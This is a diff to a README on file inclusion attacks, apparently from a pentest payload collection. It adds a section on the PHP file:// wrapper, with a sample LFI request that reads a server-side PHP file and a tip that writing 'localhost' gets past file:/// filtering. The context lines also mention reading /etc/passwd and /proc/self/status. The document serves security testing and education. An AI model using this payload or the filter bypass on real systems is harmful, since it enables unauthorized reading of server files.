Adding `file://` wrapper

File Inclusion/README.md

@@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
 
 ## LFI / RFI using wrappers
 
+### Wrapper file://
+It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
+
+```shell
+http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
+```
+Note that using `localhost` above bypasses `file:///` filtering.
+
 ### Wrapper php://filter
 
 The part "`php://filter`" is case insensitive
@@ -623,4 +631,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
 * [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
-* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
+* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)